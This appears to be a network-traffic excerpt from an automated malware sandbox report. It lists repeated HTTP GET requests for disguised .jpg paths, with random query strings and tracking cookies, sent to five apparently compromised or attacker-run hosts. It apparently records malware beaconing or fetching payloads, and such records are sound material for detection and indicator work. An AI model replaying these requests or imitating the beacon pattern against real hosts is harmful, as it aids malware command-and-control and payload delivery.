        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1055bd73=-1828476661 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1122b37b=1437434215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?11c3299b=-1612941709 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1208a479=1210225124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?125c9be5=924177327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?12dacc76=1265316312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?13a86083=-1326750565 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?14106f9c=673242936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?14890695=-1538771800 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?14e27329=1051154811 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?155951b4=716350312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1651959c=1123336404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?16b3e9bb=-2009630110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?170da52a=1547080872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1786b5d7=1578817372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?180330c9=1611449124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?18be425f=-973991176 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?194bc1b3=-1324200987 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?19b3dafe=-414010642 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?19fa4aca=871667092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1a87f96c=-1624254328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1b477e89=-633605048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bf90ddb=938613686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1c4eb48e=-970526750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1c954dcc=1438640484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1d468c2f=-1839153941 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?20c162b1=-1547244171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?211be604=-406631908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?24e8c9b5=619235765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?26879fc4=1522834916 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2bcaf743=1582807576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2cfced02=1509546500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3d14cd8b=633027043 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e44093b=-116382484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f86f717=1002352591 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?41d7fe37=-1961888438 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?445d8e02=-561061362 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?45cf8c26=389951640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4666d3a0=-1073462208 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?47518eef=-1901912610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?494885e8=-1819495128 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4e1a4979=218554042 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4fe5ce70=1066875328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?50eb79ae=-222139126 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?54bd4f7c=-29888908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5bf62f02=667228684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5fcee9d4=-1633131316 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?66b9efaa=-1696088408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?6c8a2c8f=-1305955780 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6e4b76cf=-594088546 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?72a457e7=1026930563 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7a6a3bf3=-187402266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7f8f3cd8=-14779984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8644bbad=-1200973547 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8cd08851=-1502504717 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?908734c0=-1522004096 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9a275efc=46455532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ffb83c1=-1075505530 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a5ab2386=-2018641750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9db6871=-1485987388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?adce999d=316119470 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
